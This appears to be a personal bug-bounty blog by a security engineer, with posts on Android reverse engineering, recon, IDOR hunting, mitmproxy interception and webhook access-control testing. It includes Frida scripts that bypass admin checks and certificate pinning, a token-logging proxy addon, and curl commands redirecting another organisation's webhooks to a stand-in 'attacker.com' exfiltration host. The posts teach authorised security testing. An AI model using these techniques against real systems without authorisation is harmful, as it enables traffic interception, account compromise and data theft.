~
────────────────────────────────
the first 30 minutes on a new target
reverse engineering android apps with jadx + frida
finding idors at scale
my recon methodology: from scope to first bug
broken access control in webhook implementations
mitmproxy setup for mobile interception

i'm a product security engineer at mindbody/classpass. day to day i work on security pipelines, automation, secret scanning, responsible disclosure program, occasional pentests, and ai-powered triage for tool findings.

into appsec, supply chain security, bug bounty, and security research. i like breaking things to understand how they work.

16 cves published. acknowledged by apple, microsoft, and the u.s. department of health and human services.

some of my cves
CVE-2026-34153 rce via localfilevolume fs_path injection critical
CVE-2026-34152 command injection via newline in deployment commands critical
CVE-2026-31943 ssrf protection bypass via ipv4-mapped ipv6 high
GHSA-hg2c-wm3r-f7xx ssrf via missing rfc 6598 range in ip validation high
CVE-2026-33655 ssrf bypass via unresolved hostname in notification urls high
CVE-2026-40172 privilege escalation via superuser group assignment high
GHSA-r745-8hwv unauth oauth2 refresh — non-blind ssrf + secret exfil high
CVE-2026-32695 ingress rule injection — host restriction bypass medium
← back

reverse engineering android apps with jadx + frida

apr 10, 2026 · 5 min read

most android apps trust the client way too much. hidden endpoints, hardcoded keys, debug flags left in production. all you need is the right toolchain to find them.

the approach is simple: jadx for static analysis, frida for runtime hooking. one shows you the code, the other lets you mess with it while it runs.

start by pulling the apk and throwing it into jadx:

$ adb shell pm path com.target.app
# package:/data/app/com.target.app/base.apk
$ adb pull /data/app/com.target.app/base.apk
$ jadx --decompile base.apk -d output/

look for api endpoints, auth logic, anything interesting. grep is your friend here. search for strings like /api/, Authorization, Bearer, secret.

$ grep -rni "api" output/sources/ | head -20
$ grep -rni "secret\|key\|token" output/sources/

once you find something interesting, hook it with frida to see what's happening at runtime. say you found an isAdmin() check:

// bypass.js
Java.perform(function() {
  var auth = Java.use("com.target.app.AuthManager");
  auth.isAdmin.implementation = function() {
    console.log("[+] isAdmin() called, returning true");
    return true;
  };
});
$ frida -U -f com.target.app -l bypass.js

certificate pinning? most apps use okhttp or a custom trust manager. the idea is simple — the app validates the server's certificate against a pinned hash. if it doesn't match, the connection drops. but since we control the runtime, we just hook the check and make it always pass.

for okhttp-based pinning, the target is usually CertificatePinner.check():

// ssl_bypass.js
Java.perform(function() {
  var CertPinner = Java.use("okhttp3.CertificatePinner");
  CertPinner.check.overload(
    "java.lang.String",
    "java.util.List"
  ).implementation = function(hostname, peerCerts) {
    console.log("[+] bypassing pin for: " + hostname);
    return;
  };
});

for apps using a custom TrustManager, you need to find the class that implements X509TrustManager and hook checkServerTrusted():

// trustmanager_bypass.js
Java.perform(function() {
  var tm = Java.use("com.target.app.CustomTrustManager");
  tm.checkServerTrusted.implementation = function(chain, authType) {
    console.log("[+] trusting all certs");
    return;
  };
});

run it the same way:

$ frida -U -f com.target.app -l ssl_bypass.js

now all traffic flows through your proxy. point the device to burp, and you're intercepting every request the app makes — auth tokens, api calls, everything.

one thing to watch out for: some apps stack multiple pinning layers. you might bypass okhttp but still get blocked by a native check. in that case, look for libssl hooks or use something like objection which covers most common cases out of the box.

the real value isn't in any single trick. it's in chaining static findings with dynamic confirmation. jadx tells you what the code could do. frida tells you what it actually does.

← back

the first 30 minutes on a new target

apr 13, 2026 · 5 min read

when i open a new program, i don't start running tools. i start understanding what the app does.

i sign up, create an account, and use it like a normal user. burp is capturing everything in the background, but i'm not looking at burp yet — i'm looking at the app.

what i'm looking for:

where are the IDs? — every time i see a number or uuid in a url, a request, a response, i take note. /api/org/123/members — that's getting tested later.

what's the permission model? — roles? admin/member/viewer? orgs, teams, projects? the more layers, the higher the chance someone forgot a check somewhere.

what's "mine" vs "theirs"? — if i can see my profile at /users/me, does /users/123 exist? if i can list my projects, can i list another org's?

features that look new — changelogs, product blogs, "new!" badges in the UI. new feature = new code = less tested.

features that look forgotten — export, webhook config, api keys page, advanced settings. nobody tests what nobody uses.

integrations — oauth, webhooks, api tokens, sso. every integration is a new attack surface with its own auth.

after 30 minutes i have a mental list of where to attack. then i open burp, look at the sitemap, and go endpoint by endpoint.

here's the thing most people miss though: don't just test the endpoints you see. read the javascript. apps ship their entire api client in the bundle — routes the UI doesn't use yet, admin endpoints behind feature flags, internal debug paths that never got removed. i've found more bugs in endpoints hidden in js bundles than in anything the app actually exposes in the UI.

pull every js file. search for /api/, fetch(, axios., endpoint, admin, internal. build a list of every route the app knows about, not just the ones it shows you. then test those with your low-priv account. that gap — between what the frontend knows and what the frontend shows — is where the best bugs live.

most bugs i've found didn't come from automated scanning. they came from understanding the app better than whoever tested it before me.

← back

finding idors at scale

apr 03, 2026 · 7 min read

idor — insecure direct object reference. it's been on the owasp top 10 for years and it's still everywhere. the concept is almost embarrassingly simple: change an id in a request, get someone else's data. and yet it remains one of the most rewarding bug classes to hunt for.

i think the reason it persists is that it's not really a coding mistake. it's an architecture mistake. developers build features around objects — users, orders, documents — and forget to ask the most basic question: does this person have permission to access this specific object?

the mindset

the first thing to understand is that idor isn't just "change the id and see what happens." that's the mechanic, not the methodology. the real skill is understanding how the application models ownership and access.

every app has a hierarchy. users belong to organizations. orders belong to users. documents belong to projects. the question is always: where does the app check that chain of ownership, and where does it skip?

most apps get the obvious ones right. /api/users/123/profile probably checks if you're user 123. but what about /api/users/123/invoices? or /api/users/123/api-keys? the deeper you go into the object graph, the more likely someone forgot a check.

the two-account approach

always test with two accounts. always. you can't find access control bugs with a single session. create account A (the victim) and account B (the attacker). use the app fully as account A — create data, upload files, configure settings. then try to access all of it as account B.

this sounds obvious but most people skip it because it's tedious. setting up two accounts with realistic data takes time. but it's the foundation of every idor you'll ever find.

where to look

after testing hundreds of apps, these are the places where idors show up most consistently:

api endpoints that accept an id you didn't choose. if you're making a request and the id came from a url, a dropdown, a hidden field, or a previous api response — that's a candidate. the app gave you that id, but does it verify you should have it?

export and download features. generating a pdf report, exporting csv data, downloading an attachment. these are often built as separate services that receive an object id and return the file. the auth check happens in the main app, but the export service just trusts the id it receives.

notification and activity endpoints. "get my recent activity" or "get my notifications" often leak data because they aggregate from multiple sources. the aggregation layer might not enforce the same permissions as each individual source.

admin and settings endpoints. changing org settings, managing team members, updating billing info. these are high-value targets because the impact of unauthorized access is severe. and they're often less tested because fewer people use them.

GraphQL. graphql makes idor testing interesting because the client controls the query structure. you can ask for nested relationships — "give me this project's organization's other projects" — and find paths the developers never intended to expose.

the uuid trap

a lot of developers think using uuids instead of sequential ids prevents idor. it doesn't. uuids make enumeration harder, but they don't solve the access control problem. if i can get your uuid from anywhere — a shared link, an api response, a websocket message, an email — i can still use it.

places uuids leak constantly: invitation links, public profiles, shared documents, api list endpoints, error messages, and javascript source files. once you have one valid uuid, you can test every endpoint that accepts it.

beyond read access

here's what separates a medium finding from a critical one: don't stop at reading data. test write and delete operations too.

can account B modify account A's profile? update their email address? change their password? that's account takeover through idor — critical severity.

can account B delete account A's projects? remove their team members? cancel their subscription? that's destructive idor — also critical.

most hunters stop at "i can see another user's data." that's valid, but the real impact comes from testing what else you can do with that access.

the subtle ones

the best idors aren't obvious. they hide in features you wouldn't think to test:

— search endpoints that accept a scope or org_id filter and return results from that scope without checking membership
— webhook configurations where you can point someone else's events to your url
— file upload endpoints where the parent_id determines which project the file lands in
— sso and saml flows where the account_id in the assertion isn't validated against the authenticated session
— api key management where you can list or revoke keys belonging to another user

these are the findings that make programs pay attention. not because they're technically complex, but because they show a deep understanding of how the application works.

writing the report

when you find an idor, the report matters as much as the finding. always include: what you accessed, whose data it was, and what an attacker could do with it. don't just say "i changed the id and got a 200." explain the business impact. "an attacker can read any customer's invoices, including billing addresses, payment amounts, and line items" hits different than "idor on /api/invoices/:id."

idor isn't going away. as long as apps have objects and users, there will be missing access checks. the hunters who find them consistently aren't the ones with the best tools — they're the ones who understand the application deeply enough to know where to look.

← back

my recon methodology: from scope to first bug

mar 22, 2026 · 10 min read

recon is the part that separates finding one bug from finding ten. most people jump straight into testing — i spend the first hours just mapping the target. the more surface you uncover, the more entry points you have.

here's the exact workflow i follow when i start a new program.

1. subdomain enumeration

start wide. pull subdomains from as many sources as possible and merge them:

# passive enum from multiple sources
$ subfinder -d target.com -o subs_subfinder.txt
$ amass enum -passive -d target.com -o subs_amass.txt
$ github-subdomains -d target.com -t GITHUB_TOKEN -o subs_github.txt

# merge and deduplicate
$ cat subs_*.txt | sort -u > all_subs.txt
$ wc -l all_subs.txt
# 847 unique subdomains

don't skip github dorking. you'd be surprised how many internal subdomains, staging environments, and api endpoints show up in public repos.

2. probing live hosts

not all subdomains resolve. filter for what's actually alive:

$ cat all_subs.txt | httpx -silent -status-code -title -tech-detect \
  -o live_hosts.txt

# quick look at what we're dealing with
$ cat live_hosts.txt | grep "200" | wc -l
# 312 live hosts returning 200

httpx with -tech-detect is key — it tells you what stack each host runs. react frontend? spring backend? nginx? knowing the tech narrows your attack surface immediately.

3. javascript analysis

js files are a goldmine. they leak api endpoints, internal paths, tokens, and sometimes entire api schemas. pull them all and grep:

# extract js urls from live hosts
$ cat live_hosts.txt | getJS --complete | sort -u > js_files.txt

# download them all
$ cat js_files.txt | xargs -P 10 -I{} wget -q {} -P js_downloads/

# hunt for endpoints
$ grep -rhoP '"/api/[a-zA-Z0-9_/]+"' js_downloads/ | sort -u
# /api/v1/users
# /api/v1/admin/settings
# /api/internal/debug
# /api/v2/webhooks

/api/internal/debug — that shouldn't be there. those are the findings that make recon worth it.

also look for hardcoded keys and secrets:

$ grep -rniE "(api_key|apikey|secret|token|password|aws_)" js_downloads/
$ nuclei -l js_files.txt -t exposures/tokens/

4. api discovery

with the endpoints from js analysis, start building an api map. i usually check for openapi/swagger docs first:

# common swagger/openapi paths
$ cat live_hosts.txt | while read host; do
  for path in /swagger.json /openapi.json /api-docs /swagger-ui/ /docs; do
    code=$(curl -so /dev/null -w "%{http_code}" $host$path)
    if [ "$code" != "404" ]; then
      echo "$host$path [$code]"
    fi
  done
done

finding a swagger doc is like finding the map to the treasure. every endpoint, every parameter, every model — documented.

5. nuclei scan

once you have your live hosts, run nuclei for quick wins:

$ nuclei -l live_hosts.txt \
  -t cves/ \
  -t vulnerabilities/ \
  -t exposures/ \
  -t misconfiguration/ \
  -severity medium,high,critical \
  -o nuclei_results.txt

don't rely on nuclei alone — it catches known issues, not logic bugs. but it's a good first pass that can surface easy wins while you focus on manual testing.

6. prioritize

by now you have hundreds of hosts, endpoints, and js findings. the trick is knowing where to dig first:

— staging/dev environments often have weaker auth
— admin panels exposed to the internet
— api endpoints found in js but not in public docs
— anything with internal, debug, or legacy in the path
— endpoints that accept org_id, user_id, or account_id params

that last one is where most of my idor and bac findings come from. if an endpoint takes an id as input and returns data, test it with a different user's id. simple, effective, and still one of the most common bug classes out there.

recon isn't glamorous. it's running tools, reading output, connecting dots. but every serious bug i've found started with a good recon session. skip it and you're testing blind.

← back

mitmproxy setup for mobile interception

mar 01, 2026 · 4 min read

intercepting mobile app traffic is the first step in any mobile bug bounty engagement. mitmproxy is my go-to — it's free, scriptable, and works on both android and ios. here's the setup i use every time.

install it:

$ pip install mitmproxy
$ mitmproxy --version

start the proxy. by default it runs on port 8080:

$ mitmproxy -p 8080

now configure your device to use the proxy. your laptop and phone need to be on the same network. find your local ip:

$ ifconfig | grep "inet " | grep -v 127.0.0.1
# inet 192.168.1.42 ...

on your phone, go to wifi settings, set the proxy to manual, enter your ip and port 8080. open a browser and navigate to mitm.it — this page serves the mitmproxy CA certificate.

download and install the cert. on android, this gets you user-level interception which works for most browser traffic. but apps targeting api 24+ only trust system-level certs by default.

to install as a system cert on a rooted android device:

# copy the cert from ~/.mitmproxy/
$ hashed_name=$(openssl x509 -inform PEM \
  -subject_hash_old \
  -in ~/.mitmproxy/mitmproxy-ca-cert.cer \
  | head -1)

$ cp ~/.mitmproxy/mitmproxy-ca-cert.cer $hashed_name.0

# push to device system cert store
$ adb root
$ adb remount
$ adb push $hashed_name.0 /system/etc/security/cacerts/
$ adb shell chmod 644 /system/etc/security/cacerts/$hashed_name.0
$ adb reboot

after reboot, mitmproxy's cert is trusted at the system level. apps that don't implement certificate pinning will now send all traffic through your proxy — no complaints.

for apps that do implement pinning, you'll need frida to bypass it (covered in the jadx + frida post). but the proxy setup stays the same.

some useful mitmproxy flags i use constantly:

# only intercept specific domains
$ mitmproxy --set intercept="~d api.target.com"

# dump traffic to a file for later analysis
$ mitmdump -w traffic.flow

# replay saved traffic
$ mitmdump -r traffic.flow

# run with a custom script (e.g. log all auth tokens)
$ mitmproxy -s log_tokens.py

speaking of scripts — mitmproxy's python api is where it gets really powerful. here's a quick addon that logs every authorization header it sees:

# log_tokens.py
from mitmproxy import http

def request(flow: http.HTTPFlow):
    auth = flow.request.headers.get("Authorization")
    if auth:
        print(f"[+] {flow.request.url}")
        print(f"    Token: {auth}")

run it and every request with an auth header gets logged. useful for understanding how an app handles sessions, token refresh, and multi-account flows.

that's the core setup. proxy running, cert installed, traffic flowing. from here you can start mapping endpoints, fuzzing parameters, and looking for the real bugs.

← back

broken access control in webhook implementations

mar 15, 2026 · 6 min read

webhooks are one of the most overlooked features in web apps. they're usually built late in the development cycle, bolted onto an existing api, and rarely get the same access control scrutiny as the core product. that makes them a goldmine for bac bugs.

the core question is simple: can a low-privileged user create, read, update, or delete webhooks that belong to another user or organization?

start by mapping the webhook api. most implementations follow a predictable pattern:

POST   /api/webhooks          # create
GET    /api/webhooks          # list
GET    /api/webhooks/:id      # read
PUT    /api/webhooks/:id      # update
DELETE /api/webhooks/:id      # delete

create two accounts — one admin, one low-priv. use burp to capture every webhook request from the admin account. then replay each one swapping in the low-priv token.

# create a webhook as low-priv user targeting admin's org
$ curl -X POST https://target.com/api/webhooks \
  -H "Authorization: Bearer LOW_PRIV_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "https://attacker.com/hook",
    "events": ["payment.completed"],
    "org_id": "ADMIN_ORG_ID"
  }'

if that returns 201, you just created a webhook in someone else's organization. every time a payment completes, the data goes to your server. that's a critical finding.

but don't stop at create. test every operation independently — they often have different auth checks:

# list another org's webhooks
$ curl -s https://target.com/api/webhooks?org_id=ADMIN_ORG_ID \
  -H "Authorization: Bearer LOW_PRIV_TOKEN" | jq .

# read a specific webhook's config (leaks the destination url)
$ curl -s https://target.com/api/webhooks/WEBHOOK_ID \
  -H "Authorization: Bearer LOW_PRIV_TOKEN" | jq .

# update: redirect an existing webhook to attacker-controlled url
$ curl -X PUT https://target.com/api/webhooks/WEBHOOK_ID \
  -H "Authorization: Bearer LOW_PRIV_TOKEN" \
  -d '{"url": "https://attacker.com/exfil"}'

# delete: disrupt monitoring/integrations
$ curl -X DELETE https://target.com/api/webhooks/WEBHOOK_ID \
  -H "Authorization: Bearer LOW_PRIV_TOKEN"

the most common patterns i've seen:

create is checked, but update isn't — so you can't make a new webhook in their org, but you can hijack an existing one by changing the destination url. silent data exfiltration.

list and read are often wide open — leaking webhook configs, secrets, and destination urls. even if you can't modify anything, knowing where their data flows is valuable intel.

delete is sometimes unprotected — an attacker could silently break an org's integrations. subtle denial of service that's hard to debug.

another thing to check: webhook secrets. some apps include a signing secret in the response body when you create or read a webhook:

{
  "id": "wh_123",
  "url": "https://customer.com/hook",
  "secret": "whsec_a1b2c3d4e5f6",
  "events": ["payment.completed"]
}

if a low-priv user can read that secret, they can forge webhook payloads and trick the receiving server into processing fake events. that's a whole different class of attack.

the fix is straightforward but rarely implemented correctly: every webhook operation should validate that the requesting user has the right role in the target organization. not just auth — authorization. most apps check the first, skip the second.